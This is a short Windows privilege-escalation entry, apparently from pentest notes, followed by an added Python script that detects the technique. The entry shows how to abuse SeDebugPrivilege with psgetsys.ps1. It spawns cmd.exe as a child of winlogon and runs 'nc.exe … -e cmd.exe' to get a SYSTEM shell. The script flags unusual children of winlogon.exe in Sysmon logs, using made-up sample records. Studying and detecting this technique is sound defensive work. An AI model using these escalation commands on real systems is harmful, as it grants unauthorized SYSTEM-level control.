
SeDebugPrivilege

The most powerful privilege you can get. It gives an easy SYSTEM shell.

With this privilege you can update the proc attribute list and elevate privileges.

Use the module below to do that.

import-module .\psgetsys.ps1

Find the PID of a privileged process.

Get-Process winlogon

Use that PID to attach and execute commands.

[MyProcess]::CreateProcessFromParent("552","c:\windows\system32\cmd.exe", "/c c:\windows\temp\nc.exe 127.0.0.1 4444 -e cmd.exe")
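A process started this way is logged as a child of the chosen parent, so on the defensive side the steps above show up as winlogon.exe gaining a child it does not normally have. The following is an added detection example, not part of the original page or of psgetsys.ps1; the allow list, the System32 path and the sample records are assumptions, and the field names follow Sysmon Event ID 1.

```python
import ntpath

# Assumption: processes winlogon.exe normally starts; tune this per environment.
EXPECTED_CHILDREN = {
    "winlogon.exe": {"userinit.exe", "logonui.exe", "dwm.exe", "fontdrvhost.exe"},
}
SYSTEM_DIR = r"c:\windows\system32"  # assumption: default system drive and path


def _name(path):
    """Lower-cased file name of a Windows path (empty string for None)."""
    return ntpath.basename(path or "").lower()


def suspicious_children(events, expected=EXPECTED_CHILDREN):
    """Return (ProcessId, reason) for children a watched parent should not have."""
    hits = []
    for ev in events:
        allowed = expected.get(_name(ev.get("ParentImage")))
        if allowed is None:
            continue  # parent is not one we watch
        image = ev.get("Image") or ""
        if _name(image) not in allowed:
            hits.append((ev["ProcessId"], "unexpected child image"))
        elif ntpath.dirname(image).lower() != SYSTEM_DIR:
            hits.append((ev["ProcessId"], "expected name outside System32"))
    return hits


# Constructed sample records (not real logs), using Sysmon Event ID 1 field names.
SAMPLE_EVENTS = [
    {"ProcessId": 700, "Image": r"C:\Windows\System32\userinit.exe",
     "ParentImage": r"C:\Windows\System32\winlogon.exe"},
    {"ProcessId": 4120, "Image": r"c:\windows\system32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\winlogon.exe"},
    {"ProcessId": 5012, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"ProcessId": 6300, "Image": r"C:\Users\Public\dwm.exe",
     "ParentImage": r"C:\Windows\System32\winlogon.exe"},
]

if __name__ == "__main__":
    for pid, reason in suspicious_children(SAMPLE_EVENTS):
        print(pid, reason)
```

Restricting which accounts hold SeDebugPrivilege removes the precondition; the check above covers the case where an account that holds it is misused.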
